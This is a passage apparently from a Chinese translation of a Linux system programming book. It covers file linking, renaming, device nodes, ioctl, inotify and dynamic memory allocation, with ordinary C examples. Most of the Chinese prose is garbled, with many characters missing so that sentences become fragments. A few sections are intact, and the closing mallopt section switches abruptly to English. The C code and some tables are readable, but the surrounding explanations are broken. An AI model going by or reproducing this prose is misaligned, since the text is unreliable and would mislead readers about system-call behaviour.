ENOTDIR
oldpath 或 newpath 的。
EPERM
newpath 的文件新的。
EROFS
newpath 读文件上。
以 /home/kidd/pirate 的(相
对 /home/kidd/privateer
int ret;

/*
 * create a symbolic link,
 * '/home/kidd/privateer', that
 * points at '/home/kidd/pirate'
 */
ret = symlink ("/home/kidd/pirate",
               "/home/kidd/privateer");
if (ret)
        perror ("symlink");
7.3.3 解除链接
的操作即文件。提
的调 unlink() 处理
#include <unistd.h>
int unlink (const char *pathname);
调 unlink() 文件 pathname 0。
文件的文件文件。进程文件进程
文件内文件文件。进程文件文件
。
pathname 文件。
pathname 文件(设备 FIFO或 socket调
文件文件文件的进程以。
时 unlink() -1设 errno
EACCESS
调的进程对 pathname 的写或对
pathname 的。
EFAULT
效的 pathname 。
EIO
内 I/O ()。
EISDIR
pathname 。
ELOOP
pathname 时。
ENAMETOOLONG pathname 。
ENOENT
pathname 存。
ENOMEM
内存。
ENOTDIR
pathname 的。
EPERM
。
EROFS
pathname 读文件上。
unlink() 。程我们更(”
”的 rmdir() 。
对文件的 C 提 remove()
#include <stdio.h>
int remove (const char *path);
调 remove() 文件 path 0。 path 文件
remove() 调 unlink() path remove() 调 rmdir()。
时 remove() -1 errno 以调 unlink() rmdir() 出的
效。
7.4 复制和移动文件
的文件处理文件, cp
mv 实。文件新给文件内的。
文件新的同对文件的将
(同存文件的。文件
的。备的。
7.4.1 复制
然能 Unix 实文件的
或调。 cp 或 GNOME s Nautilus 文件理工实
能。
文件 src dst 的文件的步
1. src。
2. dst存存零。
3. 将 src 读内存。
4. 将写 dst。
5. 操作 src 读写 dst。
6. dst。
7. src。
mkdir() 子的文件
单。
7.4.2 移动
操作 Unix 提文件的调。 ANSI C
文件操作的调 POSIX 对文件操作
#include <stdio.h>
int rename (const char *oldpath, const char *newpath);
调 rename() 将 oldpath newpath。文件内 inode
。 oldpath newpath 同文件∗调将。 mv
工调操作。
时 rename() 0 oldpath 的文件 newpath 。
时调 -1 oldpath 或 newpath设 errno
EACCESS
调的进程对 oldpath 或 newpath 的写或
对 oldpath 或 newpath 的或
oldpath 时对 oldpath 的写。实
oldpath 时 rename(更新 oldpath
的..。
EBUSY
oldpath 或 newpath 。
EFAULT
效的 oldpath 或 newpath 。
EINVAL
newpath oldpath oldpath
的子。
EISDIR
newpath 存 oldpath 。
ELOOP
oldpath 或 newpath 时。
EMLINK
oldpath 的或 oldpath
newpath 的。
ENAMETOOLONG oldpath 或 newpath 。
ENOENT
oldpath 或 newpath 的存或空的
。
ENOMEM
内空间。
∗然 Linux 设备即们同设备上能将
。
ENOSPC
设备空间。
ENOTDIR
oldpath 或 newpath 的(的
或 oldpath newpath 存。
ENOTEMPTY
newpath 空。
EPERM
的设 (sticky
bit)调进程的效 ID 文件
的 ID进程。
EROFS
文件读。
EXDEV
oldpath newpath 同文件上。
表 7-1 总结了在不同类型的文件之间相互移动的效果。

表格 7-1 不同类型文件互相移动效果

                  目标是普通文件    目标是目录                              目标是符号链接    目标不存在
源是普通文件       目标被源覆盖      失败，EISDIR                            目标被源覆盖      源重命名为目标
源是目录          失败，ENOTDIR     目标为空则源重命名为目标，否则失败，ENOTEMPTY  失败，ENOTDIR     源重命名为目标
源是符号链接       目标被源覆盖      失败，EISDIR                            目标被源覆盖      源重命名为目标
源不存在          失败，ENOENT      失败，ENOENT                            失败，ENOENT      失败，ENOENT

在以上所有情况中，如果源和目标位于不同的文件系统上，调用失败并返回 EXDEV。
7.5 设备节点
设备程设备的文件。程设备
上的 Unix I/O(读写时内以同
文件 I/O 的方式处理。内将给设备。设备处理
I/O 操作。设备提设备程
设备或的。设备 Unix 上件的。
设备 Unix 的处理。对
件同的 read() write() mmap() 进操作 Unix
的。
内何设备处理设备
属性设备设备。设备对的设备映射
内。设备的设备对内的设备(原
设备上的 open() -1 设 errno
ENODEV。我们的设备存的设备。
7.5.1 特殊设备节点
的 Linux 上的设备。设备 Linux
的们 Linux ABI 的出的。
空设备 /dev/null设备 1设备 3。设备文件的
root 读写。内对设备的写。对文
件的读文件(EOF。
零设备 /dev/zero设备 1设备 5。空设备内
对零设备的写。读设备 null 。
满设备 /dev/full设备 1设备 7。零设备读
null (’\0’。写 ENOSPC 设备满。
设备同的。们对程处理
(满文件。空设备零设备写们
提 I/O 操作。
7.5.2 随机数生成器
内的设备 /dev/random /dev/urandom。们的设备
1设备 8 9。
内的设备集内将集的
单存内。内的
。
– 243 –
7
文件理
读 /dev/random 时的。作的
子或的。
理上能单的能
的的。的理上存的 (周
的), 内能对能
的。 0 时读将对的以能满读
。
/dev/urandom 性; 即内以对
设备的读。对性的程 ( GNU
Privacy Guard 的) 。程
/dev/urandom /dev/random。内的 I/O
时读 /dev/random 段的时间。、
的。
7.6 带外通信
Unix 文件。单的读写操作 Unix
能的对的能操作。时程的文
件。对设备对设备的读将对件读写
设备将件。进程何读的(
(DTR进程设的校
调 ioctl()。 ioctl 理 I/O 的
以进
#include <sys/ioctl.h>
int ioctl (int fd, int request, ...);
调
fd
文件的文件
request 内进程对文件 fd 何操
作。
能或式(或
给内。
的程 CDROMEJECT 以 CD-ROM 设备出
。设备程的。程的能 eject
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <linux/cdrom.h>
#include <stdio.h>

int main (int argc, char *argv[])
{
        int fd, ret;

        if (argc < 2) {
                fprintf (stderr, "usage: %s <device to eject>\n", argv[0]);
                return 1;
        }

        /*
         * Opens the CD-ROM device, read-only. O_NONBLOCK
         * tells the kernel that we want to open the device
         * even if there is no media present in the drive.
         */
        fd = open (argv[1], O_RDONLY | O_NONBLOCK);
        if (fd < 0) {
                perror ("open");
                return 1;
        }

        /* Send the eject command to the CD-ROM device. */
        ret = ioctl (fd, CDROMEJECT, 0);
        if (ret) {
                perror ("ioctl");
                return 1;
        }

        ret = close (fd);
        if (ret) {
                perror ("close");
                return 1;
        }

        return 0;
}
CDROMEJECT Linux CD-ROM 设备程的性。内
ioctl() 时对文件的文件(真实文件时或设备
(设备时处理。 CD-ROM 设备出
。
我们将 ioctl() 进程的子。
7.7 监视文件事件
Linux 提文件 inotify以文件的读写
或操作。设写 GNOME s Nautilus 的文件
理。文件 Nautilus 示内文件
理的将。
读内更内更新示。
段性的上的方。更的文件
或文件理读间。
inotify内能件时(push程。文件
内 Nautilus。 Nautilus 出的示
的文件。
的程文件件。备工工。
inotify 能程进实时操作文件或写时以
更新备或。
inotify dnotify。 dnotify 的的的
文件。相对 dnotify , 程更 inotify。 inotify
内 2.6.13 程操作文件时的操作( select()
poll() inotify , 。我们
inotify。
7.7.1 初始化 inotify
inotify 进程对。调 inotify init()
inotify 实的文件
#include <inotify.h>
int inotify_init (void);
时 inotify init() -1设 errno
EMFILE
inotify 的实。
ENFILE
文件的。
ENOMEM 内存。
我们对 inotify 进以
int fd;

fd = inotify_init ( );
if (fd == -1) {
        perror ("inotify_init");
        exit (EXIT_FAILURE);
}
7.7.2 监视
进程 inotify 设。监视描述符（watch descriptor）示 Unix 相的。
内进程何件(读写或。
inotify 以文件。时 inotify
文件(子的文件的的
件。
7.7.2.1 增加新监视
调 inotify add watch() 文件或 path 上
件 mask 实 fd
#include <inotify.h>
int inotify_add_watch (int fd, const char *path,
                       uint32_t mask);
时调新的。时 inotify add watch()
-1设 errno
EACCESS 读 path 的文件。的进程能读文件。
EBADF
文件 fd 效的 inotify 实。
EFAULT
效的 path 。
EINVAL
mask 效的件。
ENOMEM 内存。
ENOSPC
inotify 。
7.7.2.2 监视掩码
监视掩码由一个或多个 inotify 事件按位或组成，它们定义在 <inotify.h> 中：

IN_ACCESS            从文件中读取。
IN_MODIFY            向文件中写入。
IN_ATTRIB            文件的元数据（如所有者、权限或扩展属性）被修改。
IN_CLOSE_WRITE       文件被关闭，且曾以写方式打开。
IN_CLOSE_NOWRITE     文件被关闭，且未曾以写方式打开。
IN_OPEN              文件被打开。
IN_MOVED_FROM        文件被移出被监视目录。
IN_MOVED_TO          文件被移入被监视目录。
IN_CREATE            在被监视目录中创建了文件。
IN_DELETE            从被监视目录中删除了文件。
IN_DELETE_SELF       被监视对象本身被删除。
IN_MOVE_SELF         被监视对象本身被移动。

还定义了如下事件，它们是单个或多个事件的组合：

IN_ALL_EVENTS        所有合法的事件。
IN_CLOSE             所有与关闭相关的事件（即 IN_CLOSE_WRITE 和 IN_CLOSE_NOWRITE）。
IN_MOVE              所有与移动相关的事件（即 IN_MOVED_FROM 和 IN_MOVED_TO）。
我们存的 inotify 实新的
int wd;

wd = inotify_add_watch (fd, "/etc", IN_ACCESS | IN_MODIFY);
if (wd == -1) {
        perror ("inotify_add_watch");
        exit (EXIT_FAILURE);
}
子对 /etc 读写。 /etc 文件读或写
inotify 件 inotify 文件 fd fd wd 提。我们
inotify 示件。
7.7.3 inotify 事件
我们 <inotify.h> inotify event inotify 件
#include <inotify.h>
struct inotify_event {
        int wd;             /* watch descriptor */
        uint32_t mask;      /* mask of events */
        uint32_t cookie;    /* unique cookie */
        uint32_t len;       /* size of 'name' field */
        char name[];        /* null-terminated name */
};
同 inotify add watch() wd 示 mask 示
件。 wd 文件件 name 存对的
文件。 len 零。的 len name
name null 进以的 inotify event 能对
。 inotify event 的时 len
能 strlen()。
wd /home/rlove IN ACCESS。读文件 /home-
/rlove/canon 时 name 将 cannon len 将 6。相对我们时以
同 /home/rlove/canon len 将 0 name 将 0(
。
cookie 相的件。我们将。
7.7.3.1 读取 inotify 事件
inotify 件单读 inotify 实相的文件即
。 inotify 提 slurping 性性以单读读件(
read() 小。段 name 读 inotify 件的
方。
我们实 inotify 实对实的。我们读
处理的件
char buf[BUF_LEN] __attribute__((aligned(4)));
ssize_t len, i = 0;

/* read BUF_LEN bytes' worth of events */
len = read (fd, buf, BUF_LEN);

/* loop over every read event until none remain */
while (i < len) {
        struct inotify_event *event = (struct inotify_event *) &buf[i];

        printf ("wd=%d mask=%d cookie=%d len=%d dir=%s\n",
                event->wd, event->mask, event->cookie, event->len,
                (event->mask & IN_ISDIR) ? "yes" : "no");

        /* if there is a name, print it */
        if (event->len)
                printf ("name=%s\n", event->name);

        /* update the index to the start of the next event */
        i += sizeof (struct inotify_event) + event->len;
}
inotify 文件的操作文件程能 select()
poll() epoll() 。进程单程进文件 I/O 时
inotify 件。
inotify 件。件 inotify 能件
IN IGNORED
wd 的。能
或对存时。我们将
件。
IN ISDIR
作对。(设作对文件。
IN Q OVERFLOW inotify 出。内内存内对件
的小。处理的件上
时内件将。读
小以件。
IN UNMOUNT
对的设备。对效内将
IN IGNORED 件。
能件设们。
程将处理件的。
件
/* Do NOT do this! */
if (event->mask == IN_MODIFY)
        printf ("File was written to!\n");
else if (event->mask == IN_Q_OVERFLOW)
        printf ("Oops, queue overflowed!\n");
相的进
if (event->mask & IN_ACCESS)
        printf ("The file was read from!\n");
if (event->mask & IN_UNMOUNT)
        printf ("The file's backing device was unmounted!\n");
if (event->mask & IN_ISDIR)
        printf ("The file is a directory!\n");
7.7.3.2 关联“移动”事件
IN_MOVED_FROM 和 IN_MOVED_TO 事件各自只描述了移动操作的一半：前者说明文件被移出被监视目录，后者说明文件被移入。因此，希望智能跟踪文件在文件系统中移动的程序（例如只做增量更新的索引程序）需要把这两个事件关联起来。
我们 inotify event 的 cookie 段。
段 cookie零将件的。设进程
/bin /sbin。 /bin 7 /sbin 8。
文件 /bin/compass /sbin/compass内将 inotify 件。
件将 wd 7 mask IN MOVED FROM name com-
pass。件将 wd 8 mask IN MOVED TO name com-
pass。件 cookie 相同 12。
文件内件。件的 wd 的。
的文件或出的进程将
的件。 cookie 的件程
的。
7.7.4 高级监视选项
新的时以 mask 或
IN_DONT_FOLLOW    设置该值时，若 path 是符号链接或路径中含有符号链接，则不解引用它，inotify_add_watch() 失败返回。
IN_MASK_ADD       对已被监视的文件再次调用 inotify_add_watch()，正常行为是把监视掩码更新为新提供的 mask；设置该值则把新 mask 中的事件追加（按位或）到已有掩码上。
IN_ONESHOT        设置该值时，内核在给定对象上发生第一个事件后自动删除该监视，即一次性的监视。
IN_ONLYDIR        设置该值时，仅当提供的对象是目录才增加监视；若 path 是普通文件，inotify_add_watch() 失败返回。
例如，仅当 /etc/init.d 是目录，且 /etc 和 /etc/init.d 都不是符号链接时，才监视 /etc/init.d 是否被移动：
int wd;

/*
 * Watch '/etc/init.d' to see if it moves, but only if it is a
 * directory and no part of its path is a symbolic link.
 */
wd = inotify_add_watch (fd, "/etc/init.d",
                        IN_MOVE_SELF | IN_ONLYDIR | IN_DONT_FOLLOW);
if (wd == -1)
        perror ("inotify_add_watch");
7.7.5 删除 inotify 监视
实示能调 inotify rm watch( ) inotify 实
#include <inotify.h>
int inotify_rm_watch (int fd, uint32_t wd);
调 inotify rm watch() inotify 实(文件的 fd
wd 的 0。
int ret;

ret = inotify_rm_watch (fd, wd);
if (ret)
        perror ("inotify_rm_watch");
时调 -1设 errno
EBADF
效的 inotify 实 fd。
EINVAL wd 给 inotfy 实上的效。
时内 IN IGNORED 件。内
操作的时件。的文件文件
的。内 IN IGNORED。性以程
IN IGNORED 件处理对件处理。对 GNOME
s Beagle 理的上的的
的。
7.7.6 获取事件队列大小
处理件小以 inotify 实文件上 ioctl(
FIONREAD。的以示的的
unsigned int queue_len;
int ret;

ret = ioctl (fd, FIONREAD, &queue_len);
if (ret < 0)
        perror ("ioctl");
else
        printf ("%u bytes pending in queue\n", queue_len);
的的小的件。程以
inotify event( sizeof() 的小对段 name 小的
件。然更的进程以处理的
将读的。
文件 <sys/ioctl.h> FIONREAD。
7.7.7 销毁 inotify 实例
inotify 实及的实的文件单
int ret;

/* 'fd' was obtained via inotify_init( ) */
ret = close (fd);
if (ret == -1)
        perror ("close");
然文件内自文件进程出
时。
第 8 章
内存管理
对进程内存的。的内内
存理存(allocation内存操(manipulation的
内存 (release)。
allocate (内存的)
的的。然更的内存。然
的操作的进程的内
存何的。
将进程段内存的方以及方
的。我们将及设操作内存内的方
何内存的程内页。
8.1 进程地址空间
的操作 Linux 将的理内存。进程能
理内存上 Linux 内进程的
空间(virtual address space。空间性的 0
。
8.1.1 页和页面调度
空间页。的以及页的小(页
的小的的页的小 4K(32 ) 8K(64 )∗。
页效(invalid效 (valid) 效页(valid
page理页或存相或
上的文件。效页(invalid page
或。对效页的段。空间的。
然性实上间的小。
进程能处存的页页理内存
∗的页小原页小 ABI(程进
的。程时页小我们我
们将以。
的 页 相 。 进 程 的 页 存 理 单
(MMU页(page fault。然内存
的页。存理内存(
上同空间以内页理内
存出 (paging out) 存将的页出空间。内
将能的页出以性能。
8.1.1.1 共享和写时复制
存的页属同进程的空间能映
射同理页。同的空间(share理内存上
的。的能读的或读写的。
进程写的写页时能以。
单的内操作页的进程将
写操作的。的进程对同页读写程上的
作同步。
MMU 写操作异作内
的页的以进程进写操作。我们将方
写时(copy-on-write(COW∗。读的以效的
空间。进程写页时以页的
内工作进程自的。写时
以页单进的文件以效的进程。进
程对页写时能新的。
8.1.2 存储器区域
内将相同的页(blocks读写。
存(memory regions段(segments或映射(mappings.
进程以的存
• 文段(text segment进程的
读的。 Linux 文段读文件(程
或文件映射内存。
• 段 (stack) 进程的的的或
∗ fork() 写时子进程进程的空间。
。程的 (local variables) 的。
• 段 (data segment) (heap)进程的存空
间。段写的的小以的。空间
malloc 的 (将)。
• BSS 段∗(bss segment) 的。
同的 C 的 ( 0)。
Linux 方。段存的
的以 (ld) 实上将的存对文件。
以进文件的小。段内存时内单的
写时的原将们映射 0 的页上效的设
的。
• 空间映射文件文件自 C 或
的文件。以 /proc/self/maps或 pmap 程的出我们
能进程的映文件。
将 Linux 提的何内存、映射的。
8.2 动态内存分配
内存同以自内存理的
内存的以及的。内存进程时
的时的的小时
。作程程的空间或
内存的时间内存。文件
或的存内存的时。文件的小以及内的
的的小的程读
内存。
C 提内存的。 C 提内存
struct pirate ship 的提内存
空间存 pirate ship。程对内存进操作
子 struct pirate ship*。
C 的内存的 malloc():
∗的原 block started by symbol 。
#include <stdlib.h>
void *malloc (size_t size);
调 malloc() 时 size 小的内存
内存的。内存的内的自 0.
时 malloc() NULL设 errno ENOMEM。
malloc() 的单的子。小的内存
char *p;

/* give me 2 KB! */
p = malloc (2048);
if (!p)
        perror ("malloc");
或空间存
struct treasure_map *map;

/*
 * allocate enough memory to hold a treasure_map structure
 * and point 'map' at it
 */
map = malloc (sizeof (struct treasure_map));
if (!map)
        perror ("malloc");
perror (”malloc”);
调时 C 自的 void 的。
以子调时将 malloc() 的。
C++ 提自的。 C++ 的对
malloc() 的作:
char *name;

/* allocate 512 bytes */
name = (char *) malloc (512);
if (!name)
        perror ("malloc");
C 的程喜将( malloc的
void。我对。的
void 的时出。更的的
时的 BUG∗。 malloc 时
能。
malloc 以 NULL对的程
的。程的 malloc() malloc() NULL
时程。程们作 xmalloc()
/* like malloc(), but terminates on failure */
void *xmalloc (size_t size)
{
        void *p;

        p = malloc (size);
        if (!p) {
                perror ("xmalloc");
                exit (EXIT_FAILURE);
        }

        return p;
}
8.2.1 数组分配
的内存小的时内存将更。
内存的子。时的小的
的。处理 C 提 calloc()
#include <stdlib.h>
void *calloc (size_t nr, size_t size);
∗的 int 的。 Int 的自的以
。。
调 calloc() 时以存的内存
(nr size )。以内存方式的内存小
的(能的
int *x, *y;

x = malloc (50 * sizeof (int));
if (!x) {
        perror ("malloc");
        return -1;
}

y = calloc (50, sizeof (int));
if (!y) {
        perror ("calloc");
        return -1;
}
的的。 malloc 同的 calloc 将的
0 进。 y 的 50 0 x 的
的。程上给的 50 程
calloc() 的的。的进
0 0 的。
0 的内存即内存存
的。的我们 memset 提的
内存的。 calloc 更内以提 0 的内
存。
时 malloc() calloc() NULL设 errno
ENOMEM。
我们 C 提 calloc 以的以及
。以们自的
/* works identically to malloc( ), but memory is zeroed */
void *malloc0 (size_t size)
{
        return calloc (1, size);
}
我们以方的将 malloc0 我们的 xmalloc
/* like malloc( ), but zeros memory and terminates on failure */
void *xmalloc0 (size_t size)
{
        void *p;

        p = calloc (1, size);
        if (!p) {
                perror ("xmalloc0");
                exit (EXIT_FAILURE);
        }

        return p;
}
8.2.2 调整已分配内存大小
C 提(或小的内存的
小
#include <stdlib.h>
void *realloc (void *ptr, size_t size);
调 realloc() 将 ptr 的内存的小 size 。
新空间的扩内存的时的能 ptr。
realloc 能的空间上 size 小 size
小的空间将原的新空间然将的空间。何
新的小的原内存的内。
的操作以扩原的 realloc() 操作能相时的。
size 0效 ptr 上调 free() 相同。
ptr NULL malloc() 。 ptr NULL 的
调的 malloc(), calloc(), 或 realloc() 的。的时
realloc() NULL 设 errno ENOMEM。时 ptr 的内存
。
最后，假设我们想缩小原来分配的存储区。我们用 calloc() 分配了保存两个 map 结构的空间：

struct map *p;

/* allocate memory for two map structures */
p = calloc (2, sizeof (struct map));
if (!p) {
        perror ("calloc");
        return -1;
}

/* use p[0] and p[1]... */
我们的以我们内存的小将的空
间给 (能的操作 map 我们
的 map 时间时):
/* we now need memory for only one map */
r = realloc (p, sizeof (struct map));
if (!r) {
        /* note that 'p' is still valid! */
        perror ("realloc");
        return -1;
}

/* use 'r'... */
free (r);
realloc() 调 p[0] 。的原。
realloc() p 以然的。我们
内存。方调我们 p
r( p 的空间小。我们的
时 r 。
8.2.3 动态内存的释放
自内存空间自。同的内
存将进程空间的式。程
们将的内存给。(然进程出的时
的存然存。
malloc(), calloc(), 或 realloc() 的内存的时
free() 给
#include <stdlib.h>
void free (void *ptr);
调 free() ptr 的内存。 ptr 调 malloc(), calloc(), 或
realloc() 的。能 free() 的内存
空间间的。
ptr 能 NULL时 free() 调 free() 时
ptr NULL。
我们子
void print_chars (int n, char c)
{
        int i;

        for (i = 0; i < n; i++) {
                char *s;
                int j;

                /*
                 * Allocate and zero an i+2 element array
                 * of chars. Note that 'sizeof (char)'
                 * is always 1.
                 */
                s = calloc (i + 2, 1);
                if (!s) {
                        perror ("calloc");
                        break;
                }

                for (j = 0; j < i + 1; j++)
                        s[j] = c;
                printf ("%s\n", s);

                /* Okay, all done. Hand back the memory. */
                free (s);
        }
}
n 空间 n 的
(2 n+1 (n+1 。然将的
的 c( 0将
将 s 。调 print chars() n 5 c X我们以
X
XX
XXX
XXXX
XXXXX
然的更效率的方实能
的内存的单小时我们以的
内存。
SunOS SCO 的 Unix 提 free() 的
cfree()的的能 free()
能 calloc() 相对. Linux free() 能处
理我们及的存的内存。
的然我们 cfree()。 Linux 的 free()
的。
子调 free() 的。程将存
空间给更的的 s
我们对内存进操作。我们将程内存
(memory leak)。内存以及内存的程出
的更的 C 程的小。 C 将
的内存理给程以程对的内存。
的(use-after-free。的
内存。调 free() 内存我们
能对进操作。程或
内存的。的工以 Electric Fence
valgrind∗。
8.2.4 对齐
的对 (alignment) 件的内存间的
。的小的时自然对 (naturally aligned)。
对 32bit 的的 4() 的 (
的 0), 自然对。以的小 2n
的 n 0。对的件的。
的对方的。的
对的将处理的。对对的的
的性能的。写的的时对的
的自然对。
8.2.4.1 预对齐内存的分配
C 自处理对。 POSIX
malloc(),calloc() realloc() 的内存空间对 C 的对
的。 Linux 的 32 以 8 对
64 以 16 对的。
时对更的页程的对。然
相同的工作将 I/O 或件的对
。 POSIX 1003.1d 提 posix memalign() 的
/* one or the other -- either suffices */
#define _XOPEN_SOURCE 600
∗ http://perens.com/FreeSoftware/ElectricFence/ 以及 http://valgrind.org。
#define _GNU_SOURCE
#include <stdlib.h>
int posix_memalign (void **memptr,
size_t alignment,
size_t size);
调 posix memalign()时 size 的内存
alignment 进对的。 alignment 2 的以及 void 小的
。的内存的存 memptr 0.
调时内存 memptr 的
EINVAL
2 的或 void 的。
ENOMEM 的内存满的。
的对 errno 设给
出。
posix memalign() 的内存 free() 。单
char *buf;
int ret;

/* allocate 1 KB along a 256-byte boundary */
ret = posix_memalign (&buf, 256, 1024);
if (ret) {
        fprintf (stderr, "posix_memalign: %s\n", strerror (ret));
        return -1;
}

/* use 'buf'... */
free (buf);
更的。 POSIX posix memalign( ) BSD SunOS
提
#include <malloc.h>
void * valloc (size_t size);
void * memalign (size_t boundary, size_t size);
valloc() 的能 malloc() 的页对的。
页的小 getpagesize() 。
相 memalign() 以 boundary 对的 boundary 2
的。子的内存存 ship
页的上
struct ship *pirate, *hms;

pirate = valloc (sizeof (struct ship));
if (!pirate) {
        perror ("valloc");
        return -1;
}

hms = memalign (getpagesize ( ), sizeof (struct ship));
if (!hms) {
        perror ("memalign");
        free (pirate);
        return -1;
}

/* use 'pirate' and 'hms'... */

free (hms);
free (pirate);
Linux 的内存以 free() 。的
Unix 提的
内存。出性能 free(
以上的内存。
更的上时 Linux 的程以
。 posix memalign()。 malloc() 的
满对时。
8.2.4.2 其它对齐问题
的对内存对以进扩展。
的的对将的更。对同的
进以及的时对的。
。的的对单的自然对更
的。的
• 的对的的的。
的以 4 对的 32bit 的以 4 对
。
• 对的以自的对
。以 char (能以 1 对) int (能以 4
对)自 3 作 int 以 4 对。程
们时的的空间
。以将的小进。 GCC 时
-Wpadded 以。时出。
• 的对的。
• 的对的。以对
对的对。以的自
然对的。
。处理绝的对以
的的时。然的处理
的时。
设对的对的
的时处理能对的
对。的段 c badnews 的程将 c
unsigned long 读
char greeting[] = "Ahoy Matey";
char *c = &greeting[1];
unsigned long badnews = *(unsigned long *) c;
unsigned long 能以 4 或 8 对 c 然以 1
对。 c 进读将对。的的
同的上同小性能程。
以能处理对的内出的进程 SIGBUS
进程。我们。
的子实出的的。然实的子
们更。
8.3 数据段的管理
Unix 上提理段的。然 malloc()
的方更程。我
满的同时给自实
的的
#include <unistd.h>
int brk (void *end);
void * sbrk (intptr_t increment);
Unix 的时同
段。存的段的上段的
。的 (break) 或 (break point)。
段存自的内存映射我们映射的
。
调 brk() 设 (段的) 的 end。的时
0。的时 -1设 errno ENOMEM。
调 sbrk() 将段 increment increment 。 sbrk()
的。以 increment 0 时的的
printf ("The current break point is %p\n", sbrk (0));
POSIX C 。的 Unix
。的程的。
8.4 匿名存储器映射
glibc 的内存段内存映射。实 malloc( ) 方
将段的小 2 的的小的的满
。单的将。相的空
的们更的。的空的以 brk(
) 将内存给。
内存(buddy memory allocation scheme。的
单的。的内存
的小时内(Internal fragmentation。内存的
率。空存满单
的空间以处理时的。同内存(
能更的或的(的存。
内存的 glibc 能将
的内存给。内存的 A B。 A
处的 B A 的 B A
glibc 能相的调。存的内存
的空空间。
glibc 将空间给∗。
。 glibc 的内存以的
。的的内存时 glibc 小段的小。
方的。
对 的 glibc 内 存 映
射。(anonymous memory mapping满。存映射
的文件的映射相文件 - 以。实
上内存映射 0 的的内存以
。以单的。映射的存
的以段内。
映射内存处
• 。程内存的时映射
内存给。
∗glibc 更进的存 arena 。
• 存映射的小的调的以设能的映射
(。
• 存的内存映射。理的。
映射
• 存映射页小的。以小页
的的空间。对小的空间的更
相对的空间的空间将更。
• 新的内存映射内存的
及何内操作。小的的。
自的 glibc 的 malloc() 段满小的
内存映射满的。的调的(
的内存 glibc 的同。
128KB 128KB 小的实相的
存映射实。
8.4.1 创建匿名存储器映射
或内存映射或写自
的内存工自的内存映射 Linux 将
单。 mmap(内存映射
munmap(
#include <sys/mman.h>
void * mmap (void *start,
size_t length,
int prot,
int flags,
int fd,
off_t offset);
int munmap (void *start, size_t length);
理文件存映射文件的存
映射更单。的。我们
子
void *p;

p = mmap (NULL,                        /* do not care where */
          512 * 1024,                  /* 512 KB */
          PROT_READ | PROT_WRITE,      /* read/write */
          MAP_ANONYMOUS | MAP_PRIVATE, /* anonymous, private */
          -1,                          /* fd (ignored) */
          0);                          /* offset (ignored) */
if (p == MAP_FAILED)
        perror ("mmap");
else
        /* 'p' points at 512 KB of anonymous memory... */
对的映射 mmap() 的子。然
程映射小的。
• start设 NULL映射以内的
上。然给 non-NULL 以的页对的
性。实上程真映射上!
• prot 同时设 PROT READ PROT WRITE 映射
读写的。能读写的空存映射的。方
将映射映射能的。
• flags 设 MAP ANONYMOUS 映射的设
MAP PRIVATE 映射的。
• MAP ANONYMOUS 设 fd offset 将的。然
更的 fd -1程的
性。
映射的内存上的。映射进
的处的页 0 进。内写时
(copy-on-write) 将内存映射 0 的页上的
。同时对的内存 memset()。实上
calloc( malloc( memset(效的原 glibc
映射 0 的映射的 calloc() 式的零
。调 munmap() 映射的内存给内。
int ret;

/* all done with 'p', so give back the 512 KB mapping */
ret = munmap (p, 512 * 1024);
if (ret)
        perror ("munmap");
mmap() munmap()的映射。
8.4.2 映射到 /dev/zero
Unix ( BSD) MAP ANONYMOUS
。相们的设备文件 /dev/zero 实的
方。设备文件提内存相同的。 0 的写时
页的映射存。 Linux /dev/zero 设备
以映射文件 0 的内存。实上 MAP ANONYMOUS
Linux 的程方。对的 Linux 提或
Unix 上程然以将 /dev/zero 作映射
方。文件的映射
void *p;
int fd;

/* open /dev/zero for reading and writing */
fd = open ("/dev/zero", O_RDWR);
if (fd < 0) {
        perror ("open");
        return -1;
}

/* map [0,page size) of /dev/zero */
p = mmap (NULL,                   /* do not care where */
          getpagesize ( ),        /* map one page */
          PROT_READ | PROT_WRITE, /* map read/write */
          MAP_PRIVATE,            /* private mapping */
          fd,                     /* map /dev/zero */
          0);                     /* no offset */
if (p == MAP_FAILED) {
        perror ("mmap");
        if (close (fd))
                perror ("close");
        return -1;
}

/* close /dev/zero, no longer needed */
if (close (fd))
        perror ("close");

/* 'p' points at one page of memory, use it... */
Memory mapped this way is, of course, freed with munmap(). This approach carries the extra cost of opening and closing a device file, so anonymous mappings are the faster choice where available.
8.5 高级存储器分配
The C library's allocation behavior can be tuned. Programs that want fine control over glibc's allocator can use mallopt():
#include <malloc.h>
int mallopt (int param, int value);
A call to mallopt() sets the memory-management parameter specified by param to value. On success, the call returns a nonzero value; on failure, it returns 0. Note that mallopt() does not set errno.

Linux currently supports the following param values, defined in <malloc.h>:

M_CHECK_ACTION
        The value of the MALLOC_CHECK_ environment variable (discussed in the next section).
M_MMAP_MAX
        The maximum number of anonymous mappings the allocator will create to satisfy allocation requests. When the limit is reached, further allocations fall back to the data segment until the number of mappings drops. A value of 0 disables the use of anonymous mappings altogether.

M_MMAP_THRESHOLD
        The size (in bytes) at and above which a request is satisfied with an anonymous mapping rather than from the data segment. Note that allocations smaller than the threshold may also be satisfied via anonymous mappings at the system's discretion — for instance, when the data segment is exhausted. A value of 0 causes every allocation to use an anonymous mapping, effectively disabling use of the data segment.

M_MXFAST
        The maximum size (in bytes) of a fast bin. Fast bins are special chunks on the heap that are never coalesced with adjacent chunks and never returned to the system — accepting fragmentation in exchange for quickly satisfying frequent small requests. A value of 0 disables fast bins.

M_TOP_PAD
        The amount of padding (in bytes) used when adjusting the size of the data segment. Whenever glibc uses brk() to grow the data segment, it asks for extra padding, hoping to avoid another brk() call in the near future. Likewise, when glibc shrinks the data segment, it keeps the padding rather than returning everything to the kernel. The padding trades a little waste for fewer system calls. A value of 0 disables padding.
XPG, from which mallopt() originates, specifies three further parameters: M_GRAIN, M_KEEP, and M_NLBLKS. Linux defines these, but setting them has no effect. Table 8-1 lists all of the valid parameters, their defaults, and their acceptable values.
Parameter          Origin   Default    Valid values   Special values

M_CHECK_ACTION     Linux    0          0 - 2
M_GRAIN            XPG      (unsupported on Linux)   >= 0
M_KEEP             XPG      (unsupported on Linux)   >= 0
M_MMAP_MAX         Linux    64*1024    >= 0           0 disables mmap() use
M_MMAP_THRESHOLD   Linux    128*1024   >= 0           0 maps every allocation
M_MXFAST           XPG      64         0 - 80         0 disables fast bins
M_NLBLKS           XPG      (unsupported on Linux)   >= 0
M_TOP_PAD          Linux    0          >= 0
Programs must make any mallopt() calls before their first allocation — before the first call to malloc() or any other source of dynamic memory. Usage is simple:
/* use mmap( ) for all allocations over 64 KB */
